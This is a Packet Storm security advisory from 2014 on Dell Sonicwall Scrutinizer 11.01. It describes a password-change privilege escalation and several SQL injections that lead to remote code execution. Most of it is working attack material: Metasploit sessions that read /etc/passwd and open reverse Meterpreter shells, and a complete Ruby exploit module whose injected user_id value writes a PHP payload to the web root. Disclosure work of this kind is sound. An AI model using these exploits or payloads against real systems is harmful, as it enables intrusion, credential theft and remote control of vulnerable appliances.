Dell Sonicwall Scrutinizer 11.01 Code Execution / SQL Injection

2014-07-10T00:00:00
ID PACKETSTORM:127429
Type packetstorm
Reporter Brandon Perry
Modified 2014-07-10T00:00:00

Description

                                        
                                            `Dell Scrutinizer 11.01 several vulnerabilities  
http://www.mysonicwall.com has a trial available.  
  
  
Dell Sonicwall Scrutinizer suffers from several SQL injections, many of which can end up with  
remote code execution. An attacker needs to be authenticated, but not as an administrator.  
However, that wouldn’t stop anyone since there is also a privilege escalation vulnerability in that  
any authenticated user can change any other user’s password, including the admin. One SQL  
injection, which a Metasploit module was provided for, requires this privilege escalation to reach  
since it exists in the new user mechanism only available to admins.  
  
Privilege escalation via password change mechanism  
———————————————————-  
When changing you password, you POST a request with a savePrefs variable. This variable is  
actually the id of the user whose password is being changed. By changing it to ‘1’, for instance,  
you will change the password for the person with an ID of 1 (which is always admin as far as I  
can tell).  
  
  
SQL injection in new user mechanism (requires admin)  
————————————————————-  
When creating a new user, the selectedUserGroup variable POSTed to /cgi-bin/admin.cgi is  
vulnerable to SQL injection that allows an attacker to read an arbitrary file from the FS.  
  
A Metasploit module was provided that exploits the above two vulnerabilities to escalate an  
arbitrary authenticated user to admin, which then will read /etc/passwd via the SQL injection.  
See auxiliary module scrutinizer_password_change.rb.  
  
  
msf auxiliary(scrutinizer_password_change) > show options  
  
Module options (auxiliary/gather/scrutinizer_password_change):  
  
Name Current Setting Required Description  
---- --------------- -------- -----------  
FILENAME /etc/passwd yes The file to read from the admin sqli  
PASSWORD password no The password to authenticate with  
Proxies no Use a proxy chain  
RHOST 192.168.1.99 yes The target address  
RPORT 80 yes The target port  
TARGETURI / yes Base Application path  
USERID 1 yes The ID of the user to have their password changed. 'admin' is  
always 1.  
USERNAME username no The username to authenticate as  
VHOST no HTTP server virtual host  
  
msf auxiliary(scrutinizer_password_change) > run  
  
[+] Log in with the user's name and the password 'passw0rd!'  
[+] Attempting to read file using 'admin' account: /etc/passwd  
[+] root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin!operator:x:11:0:operator:/root:/sbin/nologin  
games:x:12:100:games:/usr/games:/sbin/nologin  
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin  
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin  
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin  
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin  
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin  
plixer:x:500:500::/home/plixer:/bin/bash  
ntp:x:38:38::/etc/ntp:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin  
apache:x:48:48:Apache:/var/www:/sbin/nologin  
rtkit:x:499:498:RealtimeKit:/proc:/sbin/nologin  
pulse:x:498:497:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin  
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash  
tcpdump:x:72:72::/:/sbin/nologin  
  
[*] Auxiliary module execution completed  
msf auxiliary(scrutinizer_password_change) >  
  
  
  
Within the appliance, you may see /home/plixer/scrutinizer/html/d4d/exporters.php. This script,  
which is used actively throughout the web UI, is riddled with SQL injections. You can read the  
file and see the way the programmer(s?) is building their SQL injections. I will detail some of the  
injections that I could exploit and achieve RCE with (with Metasploit modules).  
  
The changeUnit function is vulnerable to a UNION-based SQL injection in the user_id parameter  
which allows a remote user to write a file to the filesystem via the OUTFILE vector. We have  
write permissions on the folder from the sql injection, so a PHP script can be written to /home/  
plixer/scrutinizer/html/d4d/ and the code will be executed upon a GET. A metasploit module was  
provided for this. (see scrutinizer_changeunit_sqli_exec.rb)  
  
msf exploit(scrutinizer_changeunit_sqli_exec) > set RHOST 192.168.1.99  
RHOST => 192.168.1.99  
msf exploit(scrutinizer_changeunit_sqli_exec) > set USERNAME username  
USERNAME => username  
msf exploit(scrutinizer_changeunit_sqli_exec) > set PASSWORD password  
PASSWORD => password  
msf exploit(scrutinizer_changeunit_sqli_exec) > exploit  
  
[*] Started reverse handler on 192.168.1.31:4444  
[*] Sending stage (39848 bytes) to 192.168.1.99  
[*] Meterpreter session 3 opened (192.168.1.31:4444 -> 192.168.1.99:55077) at 2014-04-20  
12:18:22 -0500  
[+] Deleted /home/plixer/scrutinizer/html/d4d/q0Oe8orPuCgoBAgk.php  
  
meterpreter > sysinfo  
Computer : fdsafds  
OS : Linux fdsafds 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013  
x86_64  
Meterpreter : php/php  
meterpreter >  
  
  
  
The methodDetail function is vulnerable to a UNION-based SQL injection similar to the one  
above. The methodDetail parameter itself is what is vulnerable. A metasploit module that  
achieves RCE via this vector has been supplied. ( see scrutinizer_methoddetail_sqli_exec.rb)  
  
msf exploit(scrutinizer_methoddetail_sqli_exec) > set USERNAME username  
USERNAME => username  
msf exploit(scrutinizer_methoddetail_sqli_exec) > set PASSWORD password  
PASSWORD => password  
msf exploit(scrutinizer_methoddetail_sqli_exec) > set RHOST 192.168.1.99  
RHOST => 192.168.1.99  
msf exploit(scrutinizer_methoddetail_sqli_exec) > exploit  
!  
[*] Started reverse handler on 192.168.1.31:4444  
[*] Sending stage (39848 bytes) to 192.168.1.99  
[*] Meterpreter session 2 opened (192.168.1.31:4444 -> 192.168.1.99:55063) at 2014-04-20  
12:16:23 -0500  
[+] Deleted /home/plixer/scrutinizer/html/d4d/6QOILiKezqXHEU07.php  
  
meterpreter > sysinfo  
Computer : fdsafds  
OS : Linux fdsafds 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013  
x86_64  
Meterpreter : php/php  
meterpreter >  
  
  
The xcNetworkDetail function is vulnerable to a UNION-based SQL injection like the ones  
above. The xcNetworkDetail parameter is itself what is vulnerable. A metasploit module was  
provided for this. (see scrutinizer_xcnetworkdetail_sqli_exec.rb)  
  
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > set RHOST 192.168.1.99  
RHOST => 192.168.1.99  
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > set USERNAME username  
USERNAME => username  
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > set PASSWORD password  
PASSWORD => password  
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > exploit  
  
[*] Started reverse handler on 192.168.1.31:4444  
[*] Sending stage (39848 bytes) to 192.168.1.99  
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:55045) at 2014-04-20  
12:14:57 -0500  
[+] Deleted /home/plixer/scrutinizer/html/d4d/AJ7W4nC4TOpLuS4F.php  
  
meterpreter > sysinfo  
Computer : fdsafds  
OS : Linux fdsafds 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013  
x86_64  
Meterpreter : php/php  
meterpreter >   
  
=======  
  
# This module requires Metasploit: http//metasploit.com/download  
##  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::FileDropper  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution",  
'Description' => %q{  
Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows  
an attacker to write arbitrary files to the file system. This vulnerability is used  
to write a PHP script to the file system to gain RCE.  
  
This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com  
},  
'License' => MSF_LICENSE,  
'Author' => [],  
'References' => [],  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Targets' => [['Dell Sonicwall Scrutinizer 11.01', {}],],  
'Privileged' => false,  
'DisclosureDate' => "",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]),  
OptString.new('USERNAME', [ false, "The username to authenticate as"]),  
OptString.new('PASSWORD', [ false, "The password to authenticate with" ])  
], self.class)  
end  
  
def exploit  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),  
'vars_get' => {  
'name' => datastore['USERNAME'],  
'pwd' => datastore['PASSWORD']  
}  
})  
  
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/  
sessionid = $2  
  
cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{$1}"  
  
hexstr = ("<?php " + payload.encoded + " ?>").bytes.map { |b| sprintf("%02x",b) }.join  
  
post = {  
'ti' => 1,  
'limit' => 25,  
'page' => 0,  
'order' => '',  
'dir' => 'DESC',  
'bbp' => 'percent',  
'changeUnit' => '',  
#should be trivial to support windows, just change the paths  
'user_id' => "-9513 OR 9319=9319 LIMIT 0,1 INTO OUTFILE '/home/plixer/scrutinizer/html/d4d/#{sessionid}.php' LINES TERMINATED BY 0x#{hexstr}"  
}  
  
register_files_for_cleanup("/home/plixer/scrutinizer/html/d4d/#{sessionid}.php")  
  
send_request_cgi({  
'uri' => normalize_uri(target_uri, '/d4d/exporters.php'),  
'method' => 'POST',  
'vars_post' => post,  
'cookie' => cookie  
})  
  
send_request_cgi({ 'uri' => normalize_uri(target_uri, "/d4d/#{sessionid}.php")})  
end  
end  
  
__END__  
msf exploit(scrutinizer_sqli_exec) > show options  
  
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec):  
  
Name Current Setting Required Description  
---- --------------- -------- -----------  
PASSWORD passw0rd! no The password to authenticate with  
Proxies no Use a proxy chain  
RHOST 192.168.1.99 yes The target address  
RPORT 80 yes The target port  
TARGETURI / yes Base Application path  
USERNAME username no The username to authenticate as  
VHOST no HTTP server virtual host  
  
  
Exploit target:  
  
Id Name  
-- ----  
0 Dell Sonicwall Scrutinizer 11.01  
  
  
msf exploit(scrutinizer_sqli_exec) > exploit  
  
[*] Started reverse handler on 192.168.1.31:4444   
[*] Sending stage (39195 bytes) to 192.168.1.99  
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600  
  
meterpreter > shell  
Process 3038 created.  
Channel 0 created.  
id  
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer)  
uname -a  
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux  
  
  
  
`